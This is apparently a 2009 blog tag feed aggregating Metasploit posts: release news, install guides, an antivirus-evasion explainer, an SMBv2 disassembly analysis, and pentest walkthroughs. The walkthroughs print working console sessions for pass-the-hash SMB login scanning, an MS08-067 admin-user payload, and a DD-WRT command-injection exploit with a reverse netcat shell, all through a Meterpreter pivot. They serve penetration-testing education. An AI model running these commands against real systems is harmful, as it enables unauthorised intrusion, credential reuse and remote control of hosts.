metasploit « WordPress.com Tag Feed

More IE security woes: Attacks appear imminent as exploit is improved

cre8group — Mon, 30 Nov 2009 14:07:08 +0000

http://infoworld.com/d/security-central/more-ie-security-woes-attacks-appear-imminent-exploit-improved-104

Missing npptools.dll in Windows 7

Bruury — Wed, 25 Nov 2009 13:19:55 +0000

I found this problem when I want to instal Metasploit Framework (MSF) in my Win7 box. And today I e

Metasploit Framework in neuer Version 3.3 erschienen

Guido Strunck — Sun, 22 Nov 2009 17:37:57 +0000

Das Metasploit-Projekt hat die neue Version 3.3 seiner gleichnamigen Plattform für Pen-Tests bereit gestellt. Das aktuelle Release enthält mehr als 440 neue Exploit-Module, 216 weitere Hilfsmodule und ermöglicht die Fernsteuerung von Rechnern über einen eingebauten VNC-Dienst. Außerdem unterstützt die neue Version nun auch IPv6 und kann zur Prüfung von Sicherheitslücken in Microsofts neuem Flaggschiff Windows 7 eingesetzt werden.

Seit der letzten, vor etwa einem Jahr veröffentlichten, Version wurden etwa 180 bekannte Fehler korrigiert, so das Sicherheitsforscher H.D. Moore darin eine der am intensivsten getesteten Versionen des bekannten Tools sieht. Moore hatte das Metasploit-Projekt 2003 ins Leben gerufen und seine Firma Rapid7 hatte kürzlich die Betreuung des Open-Source–Projektes (BSD-Lizenz) übernommen.

Auf Bugtraq wurde dazu von H.D.Moore eine Mail veröffentlicht, in der er die verschiedenen systemspezifischen Erweiterungen und Verbesserungen der Metasploit-Plattform ausführlich erläutert.

Metasploit Framework ist ein Werkzeug für Penetrationstester, die im Auftrag von Unternehmen oder Prüfgesellschaften die Sicherheit von Netzwerken oder Anwendungen prüfen. Es enthält eine umfangreiche Sammlung von Exploits in Form geskripteter Module, die bekannte Sicherheitslücken in Programmen und Rechnersystemen ausnutzen. So kann ein Penetrationstester fehlende Sicherheitspatches und unzureichende Schutzvorkehrungen finden sowie die Angreifbarkeit von Systemen dokumentieren.

Die offene Verfügbarkeit macht die Exploit-Sammlung auch für privat am Thema Exploits und Security Interessierte sowie für Admins und IT-Experten in Unternehmen interessant. Schon um sich mit dem Stand der Technik beim Thema Pen-Testing und Exploits zu befassen.

Nützlich ist Metasploit vor allem, wenn man einen Rechner „härten“ und das auch austesten will. Metasploit ist auch nützlich, um die Güte eines heuristischen Malware-Scanners zu prüfen. Ein guter Scanner sollte zumindest einige Teile des Pakets als „potentiell gefährlichen Code“ identifizieren können. Erfahrungsgemäß gibt es bei Viren- und sonstigen Scannern große Qualitätsunterschiede bei der heuristischen Schadcode-Erkennung.

Metasploit Framework 3.3 Released!

tweetycoaster — Sun, 22 Nov 2009 09:47:33 +0000

We are excited to announce the immediate availability of version 3.3 of the Metasploit Framework. This release includes 446 exploits, 216 auxiliary modules, and hundreds of payloads, including an in-memory VNC service and the Meterpreter. In addition, the Windows payloads now support NX, DEP, IPv6, and the Windows 7 platform. More than 180 bugs were fixed since last year’s release of version 3.2, making this one of the more well-tested releases yet.

Metasploit runs on all modern operating systems, including Linux, Windows, Mac OS X, and most flavors of BSD. Metasploit has been used on a wide range of hardware platforms, from massive Unix mainframes to the Apple® iPhone™. Installers are available for the Windows and Linux platforms, bundling all dependencies into a single package for ease of installation. The latest version of the Metasploit Framework, as well as images, video demonstrations, documentation and installation instructions for many platforms, can be found online at http://www.metasploit.com/framework/.

source : http://blog.metasploit.com/2009/11/metasploit-framework-33-released.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+metasploit%2Fblog+(Metasploit+Blog)

BACKTRAIZANDO

barceludena — Fri, 20 Nov 2009 23:03:17 +0000

Herramientas: HP Pavilion dv5-1235la Entertainment PC (la mayorìa sirve) + Ubuntu Karmic + acceso a

Metasploit 3.3

Cezar — Thu, 19 Nov 2009 09:42:18 +0000

Ieri a fost released versiunea 3.3 a platformei de pentesting Metasploit.Ce e nou? In primul rind:

Metasploit 3.3 Released!

Jabra — Tue, 17 Nov 2009 18:20:43 +0000

HD Moore and the entire Metasploit team have released Metasploit v3.3! I’m really excited to start using this new release as it provides tons of new features including: 123 new exploits, 117 new auxiliary modules, support for Vista and Windows 7, improved stability of Meterpreter, all applicable exploits now have OSVDB references, Meterpreter with colors and much much more! More details be be found within the Release Notes.

Download Metasploit v3.3 here

Enjoy Metasploit v3.3!

Antivirus, trojaner & malware, del2

hex29a — Fri, 13 Nov 2009 08:56:52 +0000

Här är del 2 i min lilla serie om antivirus, trojaner och malware. (Om du inte redan gjort det, läs Del1)

I denna delen kommer jag berätta lite om hur virusmakare går tillväga för att dölja sina spår och gömma elak kod i program.

Som jag nämnde i förra delen använder sig antivirusprogram av signaturfiler som innehåller bitar av skadlig kod.

När antivirusprogrammet scannar datorn använder den just dessa signaturer för att se om mönstret matchas i någon av filerna på datorn.
Vad händer då om man skulle ändra i koden för viruset eller trojanen? Filen får en annan storlek och kommer få en annan checksumma, kommer då antivirusprogrammet missa den? Troligtvis inte.

De skadliga bitarna i filen kommer se likadana eller snarlika ut när programmet kompilerats. Även om man skulle ändra vissa specifika värden i koden så kommer vissa systemanrop och liknande fortfarande behöva göras vilket kommer avslöja programmets elaka egenskaper. Eftersom jag inte är en programmerare kan jag inte djupare redogöra för hur exakt antivirusprogrammen jobbar men jag kan tänka mig att det är här heuristiken kommer in i bilden. Genom att snappa upp specifika kodsnuttar och mönster som används vid attacker och annat hyss!

Hur bär sig då en illasinnad hacker åt för att dölja sina elaka program? Jo, det finns ett par sätt att obfuskera, eller dölja kod i filer.

Komprimering

Komprimering är just vad det låter som, man mer eller mindre “zippar” den körbara filen. Denna metod har givetvis legitima syften och är inte något som uppfunnits av elaka virusmakare. Att komprimera en körbar fil kan t.ex. användas för att försvåra för personer som vill knäcka ett program för att se hur det fungerar. Även den faktiska storleksminskningen är ibland av nytta när man ska distribuera en applikation över t.ex. internet.
Komprimerade filer kan även kallas packade filer (packed executables).

Kryptering

Såväl som man kan komprimera en fil kan man även kryptera den. Detta för att försvåra identifieringen av skadlig kod.

Programmen packas upp och dekrypteras “on the fly” när de körs i datorn vilket innebär att även antivirusprogram kan packa upp filer för att analys.

De flesta antivirusprogrammen idag kan läsa komprimerade och krypterade exe-filer.
Packade filer kan ibland få antivirusprogrammen att överreagera då metoderna är vanligt förekommande bland just elakartade program.

Omkodning

För att förvilla antivirusprogrammen ytterligare kan man dölja koden i program genom att kasta om processer och fylla ut filerna med oväsentlig data. Detta gör att programmet fortfarande kan exekveras av datorn men blir svårtydd av antivirusprogrammet. Det blir helt enkelt för krävande för antivirusprogrammet att gå igenom den elaka datan.

För att råda bot på detta får man analysera och försöka identifiera vilken algoritm som använts och söka efter den i programmet.

Samtliga metoder kan användas och upprepas multipla gånger för att förändra signaturen för filen.

Exempel på program som kan dölja kod är till exempel PE-Scrambler skrivet av Nick Harbour (rnicrosoft.net) och msfpayload som är ett program i Metasploit sviten (metasploit.com). Det senare har även stöd för en mängd olika omkodningsalgoritmer.

Här är ett exempel där jag testar att koda om en fil som uppfattas som skadlig. Det roliga här var att filen fick fler träffar efter den blivit omkodad

Jag använde PE-Scrambler på följande sätt:

pescambler.exe -i suspektfil.exe -o suspektfil_crypt.exe

Här är resultaten från Virus Total:

Först, den okrypterade filen:

Den omkodade filen:

Detta resultat kan bero på att antivirus-företagen har analyserat PE-Scrambler och att i detta fall gav utslag av bara förekomsten av den specifika kodningen.

Slut på del2!

I Del3 tänkte jag avsluta genom att dela med mig av lite tankar, funderingar och tips. Stay tuned!

Menjalankan Metasploit

opensuselovers — Fri, 13 Nov 2009 06:32:45 +0000

Jika pada artikel sebelumnya kami menjelaskan sedikit tentang bagaiman untuk menginstall. maka disini bagaimana untuk menjalankan.

simpel saja. pertama yang harus dilakukan kita masuk terlebih dahulu ke folder yang ada framework-3.2 yang sebelumnya telah di unpack.

cd framework-3.2

setelah itu, disana kita bisa menjalankan msfconsole, dan msfgui. dengan perintah

./msfconsole

dan

./msfgui

Loh gimana dengan Webbase???

oke-oke tenang… kalau web base kita bisa langsung memanggil di serigala api(mozila fire fox) http://127.0.0.1/55555

tapi sebelumnya tetep jalankan terlebih dahulu lewat terminal seperti diatas

./msfweb

lalu panggil http://127.0.0.1/55555

Ada cara lain. kita bisa membuat launcher

click kanan “Create launcher…”

tamvahkan name misalkan untuk ‘msfconsole’

untuk di Commandnya klik ‘Browse’

cari file msfconsole di direktori framework-3.2 yang sebelumnya telah di unpack.

klik OK. maka akan keluar hasil createnya.

dan begitu seterusnya untuk msfgui dan msfweb.

namun untuk msfweb melihat hasilnya di mozila. dengan memasukan http://127.0.0.1/55555 di address bar.

cuba buka msfgui >>>

Hasilnya.

Metasploit Framework 3.3 Release Candidate 1

tweetycoaster — Wed, 11 Nov 2009 09:50:45 +0000

This 3.3 release candidate is an early snapshot of what Metasploit 3.3 will look like. We are looking for feedback from the community about the new installers, the stability of the framework itself, and the functional changes between 3.3 and earlier releases of the Metasploit Framework. The 3.3 Draft Release Notes go into detail on the new features and behaviors of this version. For a full list of bug fixes, please refer to the Redmine ChangeLog . If you are a software packager and would like to include Metasploit 3.3 in your distribution or operating system, please contact us via email at msfdev[at]metasploit.com. The final release of 3.3 should occur before the end of November. Metasploit is a Rapid7 Open Source Project.

Metasploit on Windows 7

source : https://metasploit.com/redmine/projects/framework/wiki/Release_33RC1

owning a windows network

jcran — Fri, 06 Nov 2009 15:56:26 +0000

so… you say you were able to grab LM / NTLM hashes from a windows box??? cool. now use them in the scanner/smb/login to check & see which systems use the same hashes:

msf exploit(psexec) > use scanner/smb/login
msf auxiliary(login) > info

Name: SMB Login Check Scanner
Version: 0
License: Metasploit Framework License (BSD)

Provided by:
tebo <tebo@attackresearch.com>

Basic options:
Name       Current Setting Required Description
—-       ————— ——– ———–
RHOSTS                      yes       The target address range or CIDR identifier
RPORT      445              yes       Set the SMB service port
SMBDomain WORKGROUP        no        SMB Domain
SMBPass                     no        SMB Password
SMBUser    Administrator    no        SMB Username
THREADS    1                yes       The number of concurrent threads

Description:
This module will test a SMB login on a range of machines and report
successful logins. If you have loaded a database plugin and
connected to a database this module will record successful logins
and hosts so you can track your access.

msf auxiliary(login) > set RHOSTS 10.1.1.0/24
RHOSTS => 10.1.1.0/24
msf auxiliary(login) > set SMBPass XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX (hash goes here)
SMBPass => XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
msf auxiliary(login) > exploit
[*] 10.1.1.6 – FAILED 0xc000006d – STATUS_LOGON_FAILURE
[*] 10.1.1.21 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.21
[*] 10.1.1.25 – SUCCESSFUL LOGIN (Windows 5.0)
[*] Recording successful SMB credentials for 10.1.1.25
[*] 10.1.1.29 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.29
[*] 10.1.1.28 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 2)
[*] Recording successful SMB credentials for 10.1.1.28
[*] 10.1.1.31 – SUCCESSFUL LOGIN (Windows Server 2003 3790 Service Pack 1)

To speed it up, set THREADS > 1. Be careful not to set it too high:

[*] Error: 10.1.1.189: ActiveRecord::StatementInvalid SQLite3::BusyException: database is locked: INSERT INTO “hosts” (“address”, “name”, “comm”, “os_lang”, “mac”, “os_sp”, “arch”, “os_flavor”, “address6″, “os_name”, “desc”, “created”, “state”) VALUES(‘10.1.1.189′, NULL, ”, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, ‘2009-11-06 10:48:09′, ‘unknown’)

Thanks to tebo for the excellent work. Now, if only it worked with credcollect.

Instalando Metasploit no Cygwin

Lucas A. Araújo — Sat, 24 Oct 2009 03:36:12 +0000

Aproveitando uma dica que o André me passou, vou mostra para vocês como podem configurar o Metaspolit no cygwin de uma maneira bem simples.

Instale o cygwin (http://www.cygwin.com/)

Para quem não sabe o que é o cygwin, ele é um ambiente linux que roda em windows.

De seguida rode o setup, escolha instalar pela internet …(servidor etc..)

Instale os pacotes o Ruby e o Subversion
Subversion-ruby ( estao dentro do diretorio DEVEL)

depois digite no shell do cygwin:
$svn co http://metasploit.com/svn/framework3/trunk/

Esse comando faz o download via subversion do metasploit (sempre a ultima versao)

Para aceder ao directorio onde se encontra o msf, faça:

$cd /trunk
$ ./msfconsole

Olha ai seu Metasploit rodando ./msfconsole.

Pronto e acabaram-se as restrições que o Metasploit tem no Windows.

Aqui jí podem usufruir dos 4 consoles que o Metasploit tem para oferecer.

a de linha de comando: msfcli
a tipo console: msfconsole
a web: msfweb
e uma relativamente nova em GTK: msfgui

Que para mim o msfcli é o melhor.

Quero agradecer ao André Amorim pela dica…

By Placker

Meterpreter Script for Prefetch-Tool

milo2012 — Thu, 22 Oct 2009 16:30:04 +0000

This is the first meterpreter script I wrote for Metasploit Framework . I have integrated the use of the prefetch-tool via a meterpreter script.

As mentioned in the previous post, the windows prefetch folder contains information about what the frequently used programs are and based on this information, you can actually find out how the computer was used by the user/roles of the computer in the network.

This meterpreter script is not integrated into Metasploit. To use it, please follow the below steps

1. Download the below files

a. PrefetchTool Meterpreter Script
b. Prefetch Tool Executable

2. Copy the prefetchtool.rb file to [<metasploit installation folder>\msf3\scripts\meterpreter] folder

3. Copy prefetch.exe to [<metasploit installation folder>\msf3\data] folder

Check out the demo videos below.

http://securitytube.net/Metasploit-Post-Exploitation-Meterpreter-Script-Prefetchtool-video.aspx

http://www.youtube.com/watch?v=0z1Nuk-w2AU&fmt=22

http://vimeo.com/7204412

If you face any issues or have any cool ideas for new scripts, you can contact me at keith.lee2012[at]gmail.com. (:

Tasting Metasploit's Power

themikefiles — Wed, 14 Oct 2009 02:01:46 +0000

Just got Nessus (Tenable Network Security) version 4 and planning to use it to conduct some vulnerability assessment in our test lab. And interestingly, I found lot of machines vulnerable to MS08-067, which after the said scanning; I tried using Metasploit v3 to abuse the said flaw.

1.	Here I am showing that my client machine is vulnerable to MS08-067


2.	Now I loaded up my Metasploit console


3.	I just expand the Exploits and choose windows and ms08_067_netapi; right-click and select execute


4.	So Selecting Target, I just set it to Automatic; here I am showing the current Users list on my machine



5.	After hitting next, I have now here the Payload which is obviously to add user (with administrative privilege of course); selecting the options includes the remote IP and its remote post, username and password for that machine I will try to add. I am leaving it to you guys to look for these options/parameters using Metasploit’s user guide



6.	Hit Apply; and now you’ll see the Metasploit user has been added and a member of Administrators and Users



7.	Hope this is straight-forward enough and I’m able to share the power of Metasploit. Kudos to Metasploit Team!

Using Metasploit DD-WRT Exploit Module Thru Pivot

longjidin — Sun, 11 Oct 2009 10:29:20 +0000

Metasploit now has in the 3.3 Dev SVN an exploit for embedded device Linux distribution DD-WRT. This exploit module abuses a metacharacter injection vulnerability in the HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account. It was argued that this exploit is of low impact by some since the distribution only listens for HTTP connections thru the internal interface. In this example of using the exploit the exploit will be used thru a pivot obtained thru a client side exploit from which we will pivot, do a discovery, finger print the device and exploit it. In the following example we will start by showing our IP of the attacker machine, receiving the Meterpreter shell and showing the target box IP thru a cmd shell:

msf > ifconfig eth0
[*] exec: ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:0e:7f:f9:12:62
          inet addr:192.168.1.158  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20e:7fff:fef9:1262/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:55461 errors:0 dropped:0 overruns:0 frame:0
          TX packets:23899 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:58889891 (58.8 MB)  TX bytes:3107063 (3.1 MB)
          Interrupt:20
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
msf exploit(handler) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.1.158:4444 -> 192.168.1.100:1085)
msf exploit(handler) > session -i 1
[-] Unknown command: session.
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo 
Computer: AWINXP01
OS      : Windows XP (Build 2600, Service Pack 2).
meterpreter > execute -H -f -c -i -f cmd.exe
Process 1708 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\administrator\Desktop>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.111.200
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.111.2
C:\Documents and Settings\administrator\Desktop>exit
meterpreter >

Know we proceed to background this session and set a route thru the session to the network behind the NAT router from the information we gathered:

meterpreter >
Background session 1? [y/N]
msf exploit(handler) >
msf exploit(handler) > route add 192.168.111.0 255.255.255.0 1
msf exploit(handler) > route print
Active Routing Table
====================
   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.111.0      255.255.255.0      Session 1
msf exploit(handler) >

Now that the route is created we can use the TCP Port Scanner Auxiliary Module to do a TCP scan of the default gateway of the target network:

msf exploit(handler) > use auxiliary/scanner/portscan/tcp
msf auxiliary(tcp) > info
       Name: TCP Port Scanner
    Version: 6823
    License: Metasploit Framework License (BSD)
Provided by:
  hdm <hdm@metasploit.com>
  kris katterjohn <katterjohn@gmail.com>
Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  PORTS    1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
  RHOSTS                    yes       The target address range or CIDR identifier
  THREADS  1                yes       The number of concurrent threads
  TIMEOUT  1000             yes       The socket connect timeout in milliseconds
Description:
  Enumerate open TCP services
msf auxiliary(tcp) > set PORTS 22,23,80,443
PORTS => 22,23,80,443
msf auxiliary(tcp) > set RHOSTS 192.168.111.2
RHOSTS => 192.168.111.2
msf auxiliary(tcp) > run
[*]  TCP OPEN 192.168.111.2:22
[*]  TCP OPEN 192.168.111.2:23
[*]  TCP OPEN 192.168.111.2:80
[*] Auxiliary module execution completed
msf exploit(handler) >

Since we are going thru a Meterpreter TCP pivot is important to remember to keep the THREAD variable to 1 since Meterpreter is not multithreaded and limit the number of ports to those you want to target so as to not expend a large amount of time scanning. Now that the ports that are open we proceed to finger print one of the services by getting the banner using the connect command in Metasploit:

msf exploit(handler) > connect -c 1 192.168.111.2 23
[*] Connected to 192.168.111.2:23
DD-WRT v24 std (c) 2007 NewMedia-NET GmbH
Release: 01/26/07 (SVN revision: 5660M)
�
DD-WRTx86CI login: ^Cmsf exploit(handler) >
msf exploit(handler) >

As we can see the Telnet login banner identifies the target machine as a DD-WRT box. We know proceed to load the exploit module and set a reverse netcat payload and set the other appropriate variables. Onece we have ran the exploit and a session is created we proceed to run the Linux uname command to check the version of the device and to also check the shell is working:

msf exploit(handler) > use exploit/linux/http/ddwrt_cgibin_exec
msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LPORT 2222
LPORT => 2222
msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.111.2
RHOST => 192.168.111.2
msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.1.158
LHOST => 192.168.1.158
msf exploit(ddwrt_cgibin_exec) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 2 opened (192.168.1.158:2222 -> 192.168.1.100:4531)
uname -a
Linux DD-WRTx86CI 2.6.19.2dd-wrt #45 Fri Jan 26 06:28:01 CET 2007 i686 unknown

One advantage is that since the shell is running thru a Meterpreter session all traffic outside of the target network to the attackers box is encrypted using SSL.

For more information on this vulnerability please check the following links:

http://www.securityfocus.com/bid/35742
http://www.milw0rm.com/exploits/9209

Static Binary Analysis of Recent SMBv2 Vulnerability

longjidin — Fri, 09 Oct 2009 01:52:40 +0000

The recent SMBv2 vulnerability (CVE-2009-3103) in Microsoft Windows has gotten a lot of attention in the past few weeks. We decided that given the publicity and nature of the vulnerability, it would be interesting to post a threat analysis. With the release of Stephen Fewer’s Metasploit module to exploit this vulnerability, technical details of the vulnerability are now publicly available.Our analysis was limited to static binary analysis of srv2.sys and srvnet.sys.

The crash occurs within Smb2ValidateProviderCallback(PVOID DestinationBuffer):

.text:00017745

.text:00017745 loc_17745:

.text:00017745 movzx   eax, word ptr [esi+0Ch]

.text:00017749 mov     eax, _ValidateRoutines[eax*4]

.text:00017750 test    eax, eax

.text:00017752 jnz     short loc_1775B

This code is accessing an array of function pointers using a user-supplied index. This function pointer is then called here:

.text:0001775B

.text:0001775B loc_1775B:

.text:0001775B push    ebx

.text:0001775C call    eax ; Smb2ValidateNegotiate(x) ; Smb2ValidateNegotiate

The table consists of 19 function pointers, which seem to validate requests prior to actually executing them.

.data:0002D270 _ValidateRoutines dd offset _Smb2ValidateNegotiate@4

.data:0002D270                                         ; DATA XREF: Smb2ValidateProviderCallback(x)+4EA r

.data:0002D270                                         ; Smb2ValidateNegotiate(x)

.data:0002D274                 dd offset _Smb2ValidateSessionSetup@4 ; Smb2ValidateSessionSetup(x)

.data:0002D278                 dd offset _Smb2ValidateLogoff@4 ; Smb2ValidateLogoff(x)

.data:0002D27C                 dd offset _Smb2ValidateTreeConnect@4 ; Smb2ValidateTreeConnect(x)

.data:0002D280                 dd offset _Smb2ValidateTreeDisconnect@4 ; Smb2ValidateTreeDisconnect(x)

.data:0002D284                 dd offset _Smb2ValidateCreate@4 ; Smb2ValidateCreate(x)

.data:0002D288                 dd offset _Smb2ValidateClose@4 ; Smb2ValidateClose(x)

.data:0002D28C                 dd offset _Smb2ValidateFlush@4 ; Smb2ValidateFlush(x)

.data:0002D290                 dd offset _Smb2ValidateRead@4 ; Smb2ValidateRead(x)

.data:0002D294                 dd offset _Smb2ValidateWrite@4 ; Smb2ValidateWrite(x)

.data:0002D298                 dd offset _Smb2ValidateLock@4 ; Smb2ValidateLock(x)

.data:0002D29C                 dd offset _Smb2ValidateIoctl@4 ; Smb2ValidateIoctl(x)

.data:0002D2A0                 dd offset _Smb2ValidateCancel@4 ; Smb2ValidateCancel(x)

.data:0002D2A4                 dd offset _Smb2ValidateEcho@4 ; Smb2ValidateEcho(x)

.data:0002D2A8                 dd offset _Smb2ValidateQueryDirectory@4 ; Smb2ValidateQueryDirectory(x)

.data:0002D2AC                 dd offset _Smb2ValidateChangeNotify@4 ; Smb2ValidateChangeNotify(x)

.data:0002D2B0                 dd offset _Smb2ValidateQueryInfo@4 ; Smb2ValidateQueryInfo(x)

.data:0002D2B4                 dd offset _Smb2ValidateSetInfo@4 ; Smb2ValidateSetInfo(x)

.data:0002D2B8                 dd offset _Smb2ValidateOplockBreak@4 ; Smb2ValidateOplockBreak(x)

When the driver is first loaded, it initializes a series of structures that are responsible for registering the driver. One of the first steps that occurs is registering a series of callbacks:

PAGE:0002EFCF push    offset _SrvNetProvider

PAGE:0002EFD4 lea     eax, [ebp+DestinationString]

PAGE:0002EFD7 push    eax

PAGE:0002EFD8 mov     [ebp+var_14], offset _SrvConnectHandler@16 ; SrvConnectHandler(x,x,x,x)

PAGE:0002EFDF mov     [ebp+var_C], offset _SrvDisconnectHandler@12 ; SrvDisconnectHandler(x,x,x)

PAGE:0002EFE6 mov     [ebp+var_10], offset _SrvReceiveHandler@36 ; SrvReceiveHandler(x,x,x,x,x,x,x,x,x)

PAGE:0002EFED mov     [ebp+var_18], offset _SrvNegotiateHandler@16 ; SrvNegotiateHandler(x,x,x,x)

PAGE:0002EFF4 mov     [ebp+var_20], offset _SrvRegisterEndpoint@28 ; SrvRegisterEndpoint(x,x,x,x,x,x,x)

PAGE:0002EFFB mov     [ebp+var_1C], offset _SrvDeregisterEndpoint@12 ; SrvDeregisterEndpoint(x,x,x)

PAGE:0002F002 mov     [ebp+var_8], offset _SrvCredentialHandler@16 ; SrvCredentialHandler(x,x,x,x)

PAGE:0002F009 call    _SrvNetRegisterClient@8 ; SrvNetRegisterClient(x,x)

srvnet.sys is another driver that exports the SrvNetRegisterClient() routine. The srvnet.sys routine modifies a device extension (http://msdn.microsoft.com/en-us/library/ms794734.aspx), which maintains some internal state on each driver that registers via SrvNetRegisterClient(). This object is allocated with a size of 0×160 bytes when srvnet.sys is loaded (From DriverLoad()):

INIT:00028180

INIT:00028180 loc_28180:

INIT:00028180 lea     eax, [ebp+DeviceObject]

INIT:00028183 push    eax             ; DeviceObject

INIT:00028184 push    0               ; Exclusive

INIT:00028186 push    100h            ; DeviceCharacteristics

INIT:0002818B push    14h             ; DeviceType

INIT:0002818D lea     eax, [ebp+DestinationString]

INIT:00028190 push    eax             ; DeviceName

INIT:00028191 push    160h            ; DeviceExtensionSize

INIT:00028196 push    [ebp+DriverObject] ; DriverObject

INIT:00028199 call    ds:__imp__IoCreateDevice@28 ; IoCreateDevice(x,x,x,x,x,x,x)

INIT:0002819F mov     esi, eax

INIT:000281A1 test    esi, esi

INIT:000281A3 jge     short loc_281DF

INIT:000281FD mov     eax, [ebp+DeviceObject]

INIT:00028200 mov     eax, [eax+DEVICE_OBJECT.DeviceExtension]

INIT:00028203 push    eax             ; Resource

INIT:00028204 mov     _SrvNetDeviceExtension, eax ; Store ptr to DeviceExtension in a global variable

Within the undocumented device extension, an array of no more than 4 pointers to objects created by SrvNetRegisterClient() is maintained. These objects are allocated at the start of SrvNetRegisterClient():

.text:00014BF9 push    6662534Ch       ; Tag

.text:00014BFE add     eax, 78h

.text:00014C01 push    eax             ; int

.text:00014C02 push    edi             ; PoolType

.text:00014C03 call    _SrvNetAllocatePoolWithTag@12 ; SrvNetAllocatePoolWithTag(x,x,x)

.text:00014C08 mov     ebx, eax

.text:00014C0A cmp     ebx,

The pointer to the object is then added at the end of the array in the device extension:

.text:00014D5B mov     ecx, _SrvNetDeviceExtension

.text:00014D61 mov     [ecx+esi*4+0DCh], ebx

Each of these objects contains the function pointers shown when srv2.sys calls SrvNetRegisterClient():

.text:00014C77 pop     ecx ; ECX = 9

.text:00014C78 lea     edi, [ebx+4Ch] ; EBX = DeviceExtension, ESI = arg_0 (pointer to base of function pointer list)

.text:00014C7B rep movsd ; move 9 DWORD objects from *ESI into *EDI

The array roughly looks like this:

0x4C : 8 byte LSA_UNICODE_STRING structure

0x54 : *SrvRegisterEndpoint()

0x58 : *SrvDeRegisterEndpoint()

0x5C : *SrvNegotiateHandler()

0x60 : *SrvConnectHandler()

0x64 : *SrvReceiveHandler()

.....

Later in srvnet.sys, these routines will be called, for example within SrvNetCommonReceiveHandler():

.text:00016477 loc_16477:

.text:00016477 movzx   eax, word ptr [ebp+var_8]

.text:0001647B mov     ecx, _SrvNetDeviceExtension

.text:00016481 lea     eax, [ecx+eax*4+0DCh]

.text:00016488 cmp     dword ptr [eax], 0

.text:0001648B jz      short loc_164B2

.text:00016495 push    [ebp+arg_14]

.text:00016498 mov     eax, [edi+70h]

.text:0001649B push    [ebp+arg_8]

.text:0001649E push    [ebp+arg_4]

.text:000164A1 push    dword ptr [ebx+eax*4+0CCh]

.text:000164A8 call    dword ptr [edi+5Ch] ; Call SrvNegotiateHandler() from DeviceExtension->CallbackArray

.text:000164AB test    eax, eax

.text:000164AD mov     [ebp+var_4], eax

.text:000164B0 jge     short loc_1

The negotiate handler performs some validation, the most important of which is this check:

.text:0001602B cmp byte ptr [eax+4], 72h ; EAX = SMB packet data
.text:0001602F jnz loc_160EC

This checks the second DWORD in the packet for the negotiate SMB command, which is 0×72. If this check fails, then the routine returns an error.

Continuing to follow the code down in SrvNetCommonReceiveHandler() inside of srvnet.sys, we see that shortly after the call to the SrvNegotiateHandler() callback, the pointer to SrvConnectHandler() is stored in a structure:

.text:000164BE

.text:000164BE loc_164BE:              ;

.text:000164BE lea     eax, [edi+60h]  ;

.text:000164C1 mov     [esi+16Ch], eax ; SrvConnectHandler()

.text:000164C7 mov     eax, [edi+70h]

.text:000164CA mov     eax, [ebx+eax*4+0CCh]

.text:000164D1 mov     [esi+0A8h], eax

.text:000164D7 mov     eax, _pSrv2TraceInfo

.text:000164DC test    byte ptr [eax+0Ch], 1

.text:000164E0 jz      short loc_165

This pointer is accessed again later within SrvNetCommandReceiveHandler():

.text:000165D0 mov     [ebp+var_14], ax

.text:000165D4 mov     eax, [esi+16Ch]

.text:000165DA push    ebx

.text:000165DB call    dword ptr [eax] ; SrvConnectHandler()

We then see it being used to call SrvReceiveHandler() shortly after:

.text:00016687 loc_16687:

.text:00016687 push    [ebp+arg_20]

.text:0001668A mov     eax, [esi+16Ch]

.text:00016690 push    [ebp+arg_1C]

.text:00016693 mov     dword ptr [esi+8], 3

.text:0001669A push    [ebp+arg_14]

.text:0001669D push    [ebp+arg_C]

.text:000166A0 push    [ebp+arg_8]

.text:000166A3 push    [ebp+arg_4]

.text:000166A6 push    [ebp+arg_10]

.text:000166A9 push    dword ptr [edi]

.text:000166AB push    dword ptr [esi+0A8h]

.text:000166B1 call    dword ptr [eax+4] ; SrvReceiveHandler()

This chain of function calls will be important when understanding how the data passes between the different routines in srv2.sys.

